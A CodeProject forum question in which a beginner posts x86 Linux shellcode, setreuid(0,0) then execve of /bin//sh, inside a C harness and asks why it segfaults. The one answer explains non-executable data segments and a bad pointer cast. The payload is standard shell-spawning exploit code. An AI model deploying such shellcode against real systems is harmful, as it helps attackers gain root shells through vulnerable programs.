Click here to Skip to main content
15,917,953 members
Please Sign up or sign in to vote.
0.00/5 (No votes)
See more:
Hi, just learning how to write shellcode on my elementary os linux.

everytime i try executing this code i get a "segmentation fault"

im new to this scene and i just thought id try out the code

can someone please help

Here is the code

C#
#include <stdlib.h>

char sc[] =
//white space, such as carriage returns doesn't matter
// setreuid(0,0)
"\x31\xc0"
// xor
//%eax,%eax
"\xb0\x46"
// mov
//$0x46,%al
"\x31\xdb"
// xor
//%ebx,%ebx
"\x31\xc9"
// xor
//%ecx,%ecx
"\xcd\x80"
// int
//$0x80
// spawn shellcode with execve
"\x31\xc0"
// xor
//%eax,%eax
"\x50"
// push
//%eax
"\x68\x2f\x2f\x73\x68"
// push
//$0x68732f2f
"\x68\x2f\x62\x69\x6e"
// push
//$0x6e69622f
"\x89\xe3"
// mov
//%esp,%ebx
"\x50"
// push
//%eax
"\x53"
// push
//%ebx
"\x89\xe1"
// mov
//%esp,%ecx
"\x31\xd2"
// xor
//%edx,%edx
"\xb0\x0b"
// mov
//$0xb,%al
"\xcd\x80";
// int
//$0x80
//(;)terminates the string


int main(){
    void (*fp)(void);
    fp = (void*)sc;
    fp();

    return 0;
}
Posted

1 solution

What makes you think that would work?
It might - on some systems - but even most older systems have data segments and program segments.
Since sc is in the data segment, you can't move the program counter there!

And my C compiler wouldn't let you use this anyway:
C++
fp = (void*)sc;

As fp is not a void pointer - it's a pointer to a function returning a void.
 
Share this answer
 

This content, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)



CodeProject, 20 Bay Street, 11th Floor Toronto, Ontario, Canada M5J 2N8 +1 (416) 849-8900